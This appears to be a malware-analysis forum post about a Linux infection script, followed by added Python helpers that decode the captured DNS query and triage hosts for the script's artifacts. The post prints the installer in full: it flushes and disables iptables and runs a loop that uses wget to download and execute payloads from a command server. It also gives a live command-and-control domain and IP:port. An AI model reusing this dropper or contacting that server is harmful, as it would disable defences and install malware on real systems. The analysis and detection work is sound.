Usual one, VT: https://www.virustotal.com/en/file/1808 ... 421148489/

With the "active" effort infection using this script installer (noted the semi-automation trail):

Code:
#!/bin/bash
#00000000000
#000000000000
#0000000000
#========================================================================
iptables -F
/etc/init.d/iptables stop
chkconfig iptables off
rm -f /tmp/mmm*
while true
do
    ps aux | grep mmm | grep -v grep
    if [ $? -eq 0 ];then
        sleep 10
    else
        ls -l /tmp/mmm
        if [ $? -eq 0 ];then
            /tmp/mmm
        else
            cd /tmp/;wget http://IP:PORT/mmm ; chmod a+x mmm;/tmp/mmm
        fi
    fi
    ps aux | grep fk.sh | grep -v grep
    if [ $? -eq 0 ];then
        sleep 10
    else
        ls -l /tmp/fk.sh
        if [ $? -eq 0];then
            /tmp/fk.sh
        else
            cd /tmp;wget http://IP:PORT/fk.sh ; chmod a+x fk.sh;/tmp/fk.sh
        fi
    fi
done

It's a domain basis as CNC to knock-down:

Code:
ma.wudikkk.com. 600 IN A 120.27.28.199
wudikkk.com. 3600 IN NS dns10.hichina.com.
wudikkk.com. 3600 IN NS dns9.hichina.com.

syscall PoC:

Code:
sendto(5, "\333\373\1\0\0\1\0\0\0\0\0\0\2ma\7wudikkk\3com\0\0\1\0\1", 32, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("202.238.95.24")}, 16);

CNC IP/port is up and live, feel free to play:

Code:
120.27.28.199:1991
Located at: 120.27.28.199 || 37963 | 120.27.0.0/17 | CNNIC-ALIBABA-CN-NET | CN | ALIYUN.COM | ALIYUN COMPUTING CO. LTD

Sample spotted+contributed by malmouse - #MalwareMustDie!

Attachments
7z/infected (348.56 KiB)
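The "syscall PoC" above is the raw `sendto()` buffer as strace prints it. The following is an added example (not code from the post, the sample, or its author) that turns that octal-escaped string back into bytes and parses it as a DNS message, so the reader can confirm what the binary actually asks for: a single A/IN question for ma.wudikkk.com, recursion desired, transaction ID 0xdbfb, 32 bytes as the trace states. The payload string is copied verbatim from the post; the decoder and the `build_dns_query` inverse are generic for any uncompressed single-question query. Note that the destination in the trace (202.238.95.24:53) is the resolver the analysis host talked to, while the A record in the post maps the name to the CNC at 120.27.28.199.

```python
"""Decode the DNS query captured in the sendto() syscall trace in the post.

Added example; not code from the sample or the original author.
"""
import struct

# Copied verbatim from the strace line in the post.
STRACE_PAYLOAD = r'\333\373\1\0\0\1\0\0\0\0\0\0\2ma\7wudikkk\3com\0\0\1\0\1'

# strace prints non-printable bytes as \NNN octal (1-3 digits) or \xHH,
# and uses the usual C escapes for the rest.
_C_ESCAPES = {"n": 10, "t": 9, "r": 13, "a": 7, "b": 8, "f": 12, "v": 11,
              "\\": 92, '"': 34, "'": 39}


def strace_unescape(text: str) -> bytes:
    """Turn the quoted buffer argument strace prints back into raw bytes."""
    out = bytearray()
    i = 0
    while i < len(text):
        ch = text[i]
        if ch != "\\":
            out.append(ord(ch))
            i += 1
            continue
        i += 1
        if text[i] in "01234567":                       # octal, up to 3 digits
            j = i
            while j < len(text) and j - i < 3 and text[j] in "01234567":
                j += 1
            out.append(int(text[i:j], 8) & 0xFF)
            i = j
        elif text[i] == "x":                             # \xHH
            out.append(int(text[i + 1:i + 3], 16))
            i += 3
        else:
            out.append(_C_ESCAPES[text[i]])
            i += 1
    return bytes(out)


def parse_dns_query(pkt: bytes) -> dict:
    """Parse the header and the single question of a DNS message (RFC 1035 4.1)."""
    if len(pkt) < 12:
        raise ValueError("truncated DNS header")
    txid, flags, qdcount, ancount, nscount, arcount = struct.unpack("!6H", pkt[:12])
    if qdcount != 1:
        raise ValueError(f"expected one question, got {qdcount}")
    labels, off = [], 12
    while True:
        length = pkt[off]
        off += 1
        if length == 0:
            break
        if length & 0xC0:  # compression pointers never appear in a plain query name
            raise ValueError("compressed label in question name")
        labels.append(pkt[off:off + length].decode("ascii"))
        off += length
    qtype, qclass = struct.unpack("!HH", pkt[off:off + 4])
    return {
        "txid": txid,
        "recursion_desired": bool(flags & 0x0100),
        "is_response": bool(flags & 0x8000),
        "qname": ".".join(labels),
        "qtype": qtype,    # 1 = A
        "qclass": qclass,  # 1 = IN
        "length": off + 4,
    }


def build_dns_query(txid: int, name: str, qtype: int = 1, qclass: int = 1) -> bytes:
    """Inverse of parse_dns_query: encode a single-question query with RD=1."""
    header = struct.pack("!6H", txid, 0x0100, 1, 0, 0, 0)
    qname = b"".join(bytes([len(l)]) + l.encode("ascii") for l in name.split(".")) + b"\0"
    return header + qname + struct.pack("!HH", qtype, qclass)


if __name__ == "__main__":
    raw = strace_unescape(STRACE_PAYLOAD)
    q = parse_dns_query(raw)
    print(f"{len(raw)} bytes, txid=0x{q['txid']:04x}, "
          f"{q['qname']} type={q['qtype']} class={q['qclass']} rd={q['recursion_desired']}")
    # Round trip: re-encoding the parsed question reproduces the captured bytes.
    assert build_dns_query(q["txid"], q["qname"]) == raw
```

The same `strace_unescape` works on any `write()`, `send()` or `sendto()` buffer strace shows, which is often quicker than re-running the sample under a packet capture just to see one lookup.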
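The installer's loop leaves a small, stable set of host artifacts: a running `mmm` and `fk.sh`, the drop paths `/tmp/mmm` and `/tmp/fk.sh`, and periodic `wget` fetches from the CNC when either is missing. The following is an added triage helper (not code from the post or the sample) that matches those artifacts in `ps aux` output and on disk. The IOC values are taken from the script and DNS records in the post; the `SAMPLE_PS` lines are constructed for the demonstration, including a deliberate `grep mmm` from an analyst that must not be flagged.

```python
"""Hunt for the installer's artifacts on a host, using the IOCs in the post.

Added example; not code from the sample or the original author.
"""
import os
import subprocess

IOC_BINARIES = {"mmm", "fk.sh"}          # names the loop greps for and re-executes
IOC_PATHS = ("/tmp/mmm", "/tmp/fk.sh")   # where the loop drops and runs them
IOC_DOMAIN = "ma.wudikkk.com"            # A record in the post
IOC_IP = "120.27.28.199"                 # CNC address in the post
INTERPRETERS = {"sh", "bash", "dash", "ash"}
FETCHERS = {"wget", "curl"}


def _basename(path: str) -> str:
    return path.rsplit("/", 1)[-1]


def triage_ps(ps_lines):
    """Return [(pid, command)] for processes matching the installer's behaviour.

    Input is `ps aux` output, header optional. Matching is on the executable
    name (or the script name when run via an interpreter), not on a substring
    of the whole line, so a stray `grep mmm` does not trigger it.
    """
    hits = []
    for line in ps_lines:
        parts = line.split(None, 10)
        if len(parts) < 11 or not parts[1].isdigit():
            continue                                   # header or malformed line
        pid, cmd = int(parts[1]), parts[10]
        argv = cmd.split()
        exe = _basename(argv[0])
        if exe in IOC_BINARIES:                        # /tmp/mmm run directly
            hits.append((pid, cmd))
        elif exe in INTERPRETERS and len(argv) > 1 and _basename(argv[1]) in IOC_BINARIES:
            hits.append((pid, cmd))                    # e.g. "bash /tmp/fk.sh"
        elif exe in FETCHERS and any(
                IOC_IP in a or IOC_DOMAIN in a or _basename(a) in IOC_BINARIES
                for a in argv[1:]):
            hits.append((pid, cmd))                    # the loop's re-download step
    return hits


def triage_files(exists=os.path.exists):
    """Return the drop paths present on disk (`exists` is injectable for tests)."""
    return [p for p in IOC_PATHS if exists(p)]


# Constructed ps output for the demo; pid 3001 is the analyst's own grep.
SAMPLE_PS = [
    "USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND",
    "root 1 0.0 0.1 19232 1500 ? Ss 10:00 0:01 /sbin/init",
    "root 2311 0.0 0.0 11304 1100 ? S 10:05 0:00 /bin/bash /tmp/fk.sh",
    "root 2315 98.0 0.3 80212 3300 ? R 10:05 5:12 /tmp/mmm",
    "root 2320 0.0 0.0 9000 900 ? S 10:06 0:00 wget http://120.27.28.199:1991/mmm",
    "alice 3001 0.0 0.0 8000 800 pts/0 S+ 10:07 0:00 grep mmm",
]


def live_ps_lines():
    """Current process table on a Linux host."""
    return subprocess.run(["ps", "aux"], capture_output=True, text=True,
                          check=True).stdout.splitlines()


if __name__ == "__main__":
    for pid, cmd in triage_ps(live_ps_lines()):
        print(f"process {pid}: {cmd}")
    for path in triage_files():
        print(f"drop path present: {path}")
```

Because the loop re-downloads and re-executes whichever payload is missing within ten seconds, kill the parent shell running the loop before removing `/tmp/mmm` and `/tmp/fk.sh`, and expect `iptables -S` to show only default policies on a host where the script has run, since it flushes the rules and disables the service.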